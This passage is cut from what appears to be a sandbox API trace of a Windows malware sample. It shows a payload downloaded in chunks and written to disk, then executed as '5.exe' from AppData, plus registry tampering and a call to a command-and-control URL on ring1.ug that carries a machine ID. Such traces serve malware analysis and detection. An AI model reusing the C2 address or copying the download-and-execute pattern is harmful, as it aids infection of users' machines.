lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.970] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.970] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.974] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.974] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.974] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.975] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0044.975] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0044.975] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.008] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.008] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.009] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.009] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.013] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.013] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.018] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.019] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.020] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.021] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.021] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.022] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.022] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.022] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.022] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.023] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.023] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.023] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.023] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.024] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.024] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.024] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.024] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.025] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.025] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.025] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.052] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.052] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.053] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.053] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.053] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.054] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.054] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.054] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.054] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.055] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.057] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.057] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.058] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.058] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.058] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.059] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.059] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.059] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.060] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.060] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.060] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.060] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.061] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.061] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.061] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.061] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.062] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.062] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.062] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.062] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0045.063] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0045.063] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0xa00) returned 1 [0045.070] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0xa00, lpOverlapped=0x0) returned 1 [0045.070] CloseHandle (hObject=0x670) returned 1 [0045.075] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0045.082] InternetCloseHandle (hInternet=0xcc001c) returned 1 [0045.082] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322d838 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322d430 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0045.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b47f8 | out: hHeap=0x660000) returned 1 [0045.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0045.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322d068 | out: hHeap=0x660000) returned 1 Thread: id = 45 os_tid = 0x9dc [0041.169] timeGetTime () returned 0x114407a [0041.169] GetLastError () returned 0x54f [0041.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3bc) returned 0x326a7a0 [0041.169] GetCurrentThreadId () returned 0x9dc [0041.169] SetLastError (dwErrCode=0x54f) [0041.169] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfdaa5e4 | out: phkResult=0xfdaa5e4*=0x5d0) returned 0x0 [0041.169] RegQueryValueExW (in: hKey=0x5d0, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfdaa5d8, lpData=0xfdaa5e0, lpcbData=0xfdaa5dc*=0x4 | out: lpType=0xfdaa5d8*=0x0, lpData=0xfdaa5e0*=0x0, lpcbData=0xfdaa5dc*=0x4) returned 0x2 [0041.170] RegSetValueExW (in: hKey=0x5d0, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfdaa5e0*=0x1, cbData=0x4 | out: lpData=0xfdaa5e0*=0x1) returned 0x0 [0041.170] RegCloseKey (hKey=0x5d0) returned 0x0 [0041.170] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfdaa4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0041.170] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0041.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3240c28 [0041.170] AreFileApisANSI () returned 1 [0041.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0041.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7a) returned 0x6b7fb0 [0041.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa4e4, cbMultiByte=-1, lpWideCharStr=0x6b7fb0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0041.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfdaa368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0041.221] GetLastError () returned 0x2 [0041.221] GetLastError () returned 0x2 [0041.221] SetLastError (dwErrCode=0x2) [0041.221] GetLastError () returned 0x2 [0041.221] SetLastError (dwErrCode=0x2) [0041.221] GetLastError () returned 0x2 [0041.222] SetLastError (dwErrCode=0x2) [0041.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7fb0 | out: hHeap=0x660000) returned 1 [0041.227] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0041.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b7fb0 [0041.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575f8 [0041.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x3266ff0 [0041.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32575f8, cbMultiByte=-1, lpWideCharStr=0x3266ff0, cchWideChar=1056 | out: lpWideCharStr="D91AFC29D86891EC47704F29B0260BE8") returned 33 [0041.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x850) returned 0x326e4d0 [0041.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3266ff0 | out: hHeap=0x660000) returned 1 [0041.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575f8 | out: hHeap=0x660000) returned 1 [0041.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3266ff0 [0041.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7fb0 | out: hHeap=0x660000) returned 1 [0041.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326e4d0 | out: hHeap=0x660000) returned 1 [0041.228] lstrcpyW (in: lpString1=0xfdaaf78, lpString2="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8" [0041.228] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8", lpString2="&first=true" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8&first=true") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8&first=true" [0041.228] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php?pid=D91AFC29D86891EC47704F29B0260BE8&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0041.750] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xfdaa778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfdaa604 | out: lpBuffer=0xfdaa778*, lpdwNumberOfBytesRead=0xfdaa604*=0x22e) returned 1 [0041.751] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfdaa670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0041.751] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0041.751] AreFileApisANSI () returned 1 [0041.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0041.751] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7a) returned 0x6b7fb0 [0041.751] MultiByteToWideChar (in: 